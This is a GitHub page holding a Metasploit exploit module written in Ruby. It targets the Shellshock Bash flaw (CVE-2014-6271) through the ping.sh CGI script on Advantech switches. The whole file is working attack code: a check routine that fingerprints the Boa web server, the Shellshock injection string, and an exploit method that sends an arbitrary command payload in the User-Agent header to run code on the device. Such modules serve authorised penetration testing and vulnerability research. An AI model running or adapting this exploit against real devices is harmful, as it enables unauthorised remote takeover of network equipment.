metasploit-framework/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb at master · rapid7/metasploit-framework · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
        'Description' => %q{
          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
          handles external environment variables. This module targets the 'ping.sh' CGI
          script, accessible through the Boa web server on Advantech switches. This module
          was tested against firmware version 1322_D1.98.
        },
        'Author' => 'hdm',
        'References' => [
          [ 'CVE', '2014-6271' ],
          [ 'CWE', '94' ],
          [ 'OSVDB', '112004' ],
          [ 'EDB', '34765' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities' ],
          [ 'URL', 'https://access.redhat.com/articles/1200223' ],
          [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ]
        ],
        'Privileged' => false,
        'Arch' => ARCH_CMD,
        'Platform' => 'unix',
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00\x0A\x0D",
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'openssl generic'
                        }
        },
        'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
        'DefaultTarget' => 0,
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2015-12-01',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => [],
          'AKA' => ['Shellshock']
        }
      )
    )
    register_options([
      Opt::RPORT(80)
    ])
  end

  #
  # CVE-2014-6271
  #
  def cve_2014_6271(cmd)
    %{() { :;}; $(#{cmd}) & }
  end

  #
  # Check credentials
  #
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/cgi-bin/ping.sh'
    )
    if !res
      vprint_error("No response from host")
      return Exploit::CheckCode::Unknown('Could not determine the target status')
    elsif res.headers['Server'] =~ /Boa\/(.*)/
      vprint_status("Found Boa version #{$1}")
    else
      print_status("Target is not a Boa web server")
      return Exploit::CheckCode::Safe('The target is not vulnerable')
    end

    if res.body.to_s.index('127.0.0.1 ping statistics')
      return Exploit::CheckCode::Detected('The target service was detected')
    else
      vprint_error("Target does not appear to be an Advantech switch")
      return Exploit::CheckCode::Safe('The target is not vulnerable')
    end
  end

  #
  # Exploit
  #
  def exploit
    cmd = cve_2014_6271(payload.encoded)
    vprint_status("Trying to run command '#{cmd}'")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/cgi-bin/ping.sh',
      'agent' => cmd
    )
  end
end